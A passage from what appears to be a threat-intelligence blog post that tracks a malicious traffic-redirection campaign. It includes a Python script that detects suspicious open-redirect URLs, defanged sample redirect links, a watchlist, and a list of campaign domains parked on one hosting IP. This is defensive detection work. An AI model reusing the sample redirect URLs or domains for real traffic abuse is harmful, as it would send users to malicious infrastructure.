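    """Undo hxxp:// defanging so the indicator parses (analysis only)."""
    return url.replace("hxxp://", "http://").replace("hxxps://", "https://")

def redirect_targets(url):
    """Yield (source_host, param, target_host, target_path) per off-site redirect."""
    src = urlsplit(refang(url))
    for name, value in parse_qsl(src.query):  # parse_qsl percent-decodes values
        if name.lower() not in REDIRECT_PARAMS:
            continue
        target = value if "://" in value else "http://" + value  # scheme-less target
        dst = urlsplit(target)
        if dst.hostname and dst.hostname != src.hostname:
            yield src.hostname, name, dst.hostname, dst.path

def token_echo(host, path):
    """True for the <token>.domain/<token>/ shape of the sample targets."""
    segments = [s for s in path.split("/") if s]
    return bool(segments) and segments[0].lower() == host.split(".")[0].lower()

def triage(urls, watchlist=("biggerfun.org",)):
    """Return one finding per off-site redirect, with the reasons it was flagged."""
    findings = []
    for url in urls:
        for src, param, host, path in redirect_targets(url):
            reasons = ["off-site-redirect"]
            if token_echo(host, path):
                reasons.append("token-echo")
            if any(host == d or host.endswith("." + d) for d in watchlist):
                reasons.append("watchlisted")
            findings.append({"site": src, "param": param, "target": host, "reasons": reasons})
    return findings

# Constructed proxy-log URLs modelled on the samples above; hosts are placeholders.
SAMPLE_URLS = [
    "hxxp://forum.example/proxy.php?link=http%3A%2F%2FAb12Cd34.biggerfun.org/Ab12Cd34/",
    "hxxp://town.example/?URL=Zx9Qw8Er.biggerfun.org/Zx9Qw8Er/",
    "https://shop.example/out?url=https://partner.example/landing",
    "https://shop.example/login?url=/account",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_URLS):
        print(finding)
```

A `token-echo` hit on its own is a hunting lead rather than a verdict, since ordinary sites can repeat a host label in the path; it carries more weight combined with an off-site redirect from a site that has no reason to link there.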


[Figure: graph linking the biggerfun.org subdomains to 193.106.175.18] 


Sample traffic redirection and traffic management domains involved in the 
campaign include: 


hxxp://surelytheme.org 
hxxp://bluegaslamp.org 
hxxp://throatpills.org 
hxxp://draggedline.org 
hxxp://machinetext.org 
hxxp://climedballon.org 


[Figure: graph linking the biggerfun.org subdomains to 193.106.175.18, AS50465, IQHost Ltd, Moscow] 


Sample related domains known to have been involved in the campaign and currently 
parked at 193.106.175.18 - AS50465 - IQHost Ltd include: 




I'll continue monitoring the campaign and will post updates as soon as new 
developments take place. 


